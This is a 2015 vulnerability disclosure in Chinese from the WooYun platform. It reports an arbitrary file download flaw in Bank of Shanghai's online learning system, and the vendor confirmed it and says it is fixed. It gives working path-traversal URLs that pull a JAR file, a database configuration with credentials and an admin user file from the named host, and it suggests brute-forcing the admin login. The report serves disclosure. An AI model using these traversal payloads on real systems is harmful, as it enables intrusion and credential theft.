漏洞概要
		关注数(24)
		
		关注此漏洞
		
		
		漏洞标题:上海银行某系统任意文件下载导致敏感信息泄露
		
		
		提交时间:2015-09-08 15:36
		修复时间:2015-10-26 17:34
		公开时间:2015-10-26 17:34
		漏洞类型:任意文件遍历/下载
		危害等级:高
		自评Rank:20
		漏洞状态:厂商已经确认
		
		Tags标签:
												无
								
		
		
        
        
    	
		
		漏洞详情
		披露状态:
							
											2015-09-08:	细节已通知厂商并且等待厂商处理中
									2015-09-11:	厂商已经确认,细节仅向厂商公开
									2015-09-21:	细节向核心白帽子及相关领域专家公开
									2015-10-01:	细节向普通白帽子公开
									2015-10-11:	细节向实习白帽子公开
									2015-10-26:	细节向公众公开
								
		简要描述:
										详细说明:
    									漏洞证明:
      			上海银行网上学习平台(系统URL地址:http://learning.bankofshanghai.com/)存在任意文件下载漏洞,导致敏感信息泄露。
系统首页为,确定上海银行系统

举例说明:
1.直接访问如下URL,下载wis18.jar包
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar

可以对该jar包进行反编译获取源代码。
2.数据库配置文件下载,直接访问如下URL
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/ds.xml
包含数据库主机IP、用户名、密码等
3.管理员配置文件,用户名admin,密码是DES加密的
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml
该系统使用了DES加密,经过一番寻找,在jar包反编译后的com\wis18\core\util目录中找到了EncryptAndDecrypt.java文件,该文件该文件包含秘钥strDesKey
有了秘钥是不是可以去破解下后台管理员的密码呢,试了下了没解密成功,
但是经过测试该系统后台登录无验证,当然可以试试暴力破解了。
但该系统后台登录地址为:http://learning.bankofshanghai.com/wis18/login/manalogin.jsp

OK,问题证明到此。 
     									修复方案:
      													版权声明:转载请注明来源 路人甲@乌云
				
					漏洞回应
      																		厂商回应:
						危害等级:低
						漏洞Rank:5 
													确认时间:2015-09-11 17:33
												厂商回复:
						已修复
										最新状态:
											暂无
									       									
漏洞评价:
评论
	                    -             
                        2015-10-26 18:40 |    		
Huc-Unis						( 普通白帽子  |			        Rank:1115 漏洞数:306        | 通                   ...)